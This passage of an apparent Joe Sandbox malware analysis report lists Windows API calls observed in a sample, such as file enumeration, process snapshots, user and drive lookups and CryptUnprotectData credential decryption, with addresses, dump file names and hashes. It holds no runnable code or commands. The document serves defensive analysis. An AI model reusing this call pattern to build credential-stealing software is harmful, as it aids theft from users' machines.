                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileFindFirst
                                                                                                                                                                        • String ID: %s\*
                                                                                                                                                                        • API String ID: 1974802433-766152087
                                                                                                                                                                        • Opcode ID: 492fed63528f9666cf56d314b61d3ff12040296f02c45a4fddacab92b17814b8
                                                                                                                                                                        • Instruction ID: 3c9a1035a41002c96e52dd734289975c3edbd3d0f527fb2cfe1d7465d0a3bf71
                                                                                                                                                                        • Opcode Fuzzy Hash: 492fed63528f9666cf56d314b61d3ff12040296f02c45a4fddacab92b17814b8
                                                                                                                                                                        • Instruction Fuzzy Hash: 3CF0E2B16501099FC304DB28DC90E6937ECEB84244F040A2DE516C3392FAF6BE04CB5A
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004322AC
                                                                                                                                                                        • Process32First.KERNEL32(00000000,?), ref: 004322BE
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateFirstProcess32SnapshotToolhelp32
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2353314856-0
                                                                                                                                                                        • Opcode ID: 4b551a2f8c201a651a9930c052f208bfed4fd8ecdbd3b0c2babbbb0d043d2dc1
                                                                                                                                                                        • Instruction ID: b69c32facdc4b08414828b22e28b057fef1b3e9cb479eda9d9e38ec789d1a072
                                                                                                                                                                        • Opcode Fuzzy Hash: 4b551a2f8c201a651a9930c052f208bfed4fd8ecdbd3b0c2babbbb0d043d2dc1
                                                                                                                                                                        • Instruction Fuzzy Hash: A2F06D752053159FC3109B69CC68F56BBF9AF85701F598469F840DB391E7B0A800CF26
                                                                                                                                                                        APIs
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 00431595
                                                                                                                                                                        • GetTimeZoneInformation.KERNEL32 ref: 004315A1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocHeapInformationTimeZone
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3362249692-0
                                                                                                                                                                        • Opcode ID: 68b39ce2041e2be763347cdb8151913b3201f6ac879e09a90a703f2528e23868
                                                                                                                                                                        • Instruction ID: 86009453ec15598c9a712ebb835fdb34e9ef70f43cf1e4d0cd16c6e0fd4b4537
                                                                                                                                                                        • Opcode Fuzzy Hash: 68b39ce2041e2be763347cdb8151913b3201f6ac879e09a90a703f2528e23868
                                                                                                                                                                        • Instruction Fuzzy Hash: 86F03079B507109FCE109F24DD89F473A68BB8B364F190954F9109B3E0D6719C018A59
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00402BE1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileFindFirst
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1974802433-0
                                                                                                                                                                        • Opcode ID: 18ad3a6bec8f41be99c899bfcf52a0711b055a7ca27f19dffe250b18e5db78c1
                                                                                                                                                                        • Instruction ID: 9a9c7b953954357ff120384c066d06b2d19a0650d401855eed0428c55563916a
                                                                                                                                                                        • Opcode Fuzzy Hash: 18ad3a6bec8f41be99c899bfcf52a0711b055a7ca27f19dffe250b18e5db78c1
                                                                                                                                                                        • Instruction Fuzzy Hash: 3D41E176B202188FCB55CB58DCD4DEA73B9FFC86197050859E52AE7362EA24AE01CF44
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00420455
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileFindFirst
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1974802433-0
                                                                                                                                                                        • Opcode ID: d47b22d7c2b5d8854116b83036bc1483b5f8cda757cbb595c16f5e01f296aa4b
                                                                                                                                                                        • Instruction ID: 09395c8a0eafa750aeaa3e373b0b01c6308d5a6badcce2baeb186db3cbc76868
                                                                                                                                                                        • Opcode Fuzzy Hash: d47b22d7c2b5d8854116b83036bc1483b5f8cda757cbb595c16f5e01f296aa4b
                                                                                                                                                                        • Instruction Fuzzy Hash: C5314BB5702954AFD700DFACEC98E5D7BE5FF98300B044068E859D7361EAB8AE058B45
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00424A63
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileFindFirst
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1974802433-0
                                                                                                                                                                        • Opcode ID: c139f89202805fd745dcd052d869154fb4123a548f66920393365703e453ace0
                                                                                                                                                                        • Instruction ID: 12d9cbd333469b35ebce06d581e83ce10451d2d381d02456cf870b2c2c34d416
                                                                                                                                                                        • Opcode Fuzzy Hash: c139f89202805fd745dcd052d869154fb4123a548f66920393365703e453ace0
                                                                                                                                                                        • Instruction Fuzzy Hash: AA318BBA705104EFD708CB5CDE89E69B7F9EB893087045025E812D7360E6F5EE14CB55
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InfoSystem
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 31276548-0
                                                                                                                                                                        • Opcode ID: 82f1f6946d401927b31d1bc87c898351d45fb518fe8c5a701b9c54506745076b
                                                                                                                                                                        • Instruction ID: 76e6a26e387ad86429eda5c4ea260e08db291650480943bcd22c9eb06e69ad47
                                                                                                                                                                        • Opcode Fuzzy Hash: 82f1f6946d401927b31d1bc87c898351d45fb518fe8c5a701b9c54506745076b
                                                                                                                                                                        • Instruction Fuzzy Hash: FEF05E76A00515AFD214DF15EC81E9A37ACEB8A66CB8A0120FD48AB311E2256D158BB6
                                                                                                                                                                        APIs
                                                                                                                                                                        • CryptUnprotectData.CRYPT32 ref: 0041D222
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CryptDataUnprotect
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 834300711-0
                                                                                                                                                                        • Opcode ID: 109d3b41ba0f2e915114953e6231d59281f8724950881f92eb239cc0534ba773
                                                                                                                                                                        • Instruction ID: 7f7aae2384846f35f9c539ff48881abd0d0d9b342defdba48dac48fe7cc34cf7
                                                                                                                                                                        • Opcode Fuzzy Hash: 109d3b41ba0f2e915114953e6231d59281f8724950881f92eb239cc0534ba773
                                                                                                                                                                        • Instruction Fuzzy Hash: 52F09071A19B028FC304DF28C5A8916BBF0EF88344F058A5CE88887351E7709984CB92
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetUserNameA.ADVAPI32(00000000), ref: 00431475
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: NameUser
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2645101109-0
                                                                                                                                                                        • Opcode ID: b3eafffca078be2ca2c018cc31f46bd908eb18f9321fcc2fcf0672908623ba27
                                                                                                                                                                        • Instruction ID: 25aa36c17c4d92c73a0d58bc3163748de46586a953a07f777331ccfe371363d9
                                                                                                                                                                        • Opcode Fuzzy Hash: b3eafffca078be2ca2c018cc31f46bd908eb18f9321fcc2fcf0672908623ba27
                                                                                                                                                                        • Instruction Fuzzy Hash: 6AE086B23011102FD619975DAC81FAB739DDFC8264B0A0035F504C3310E6646C2187BA
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00439CC1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
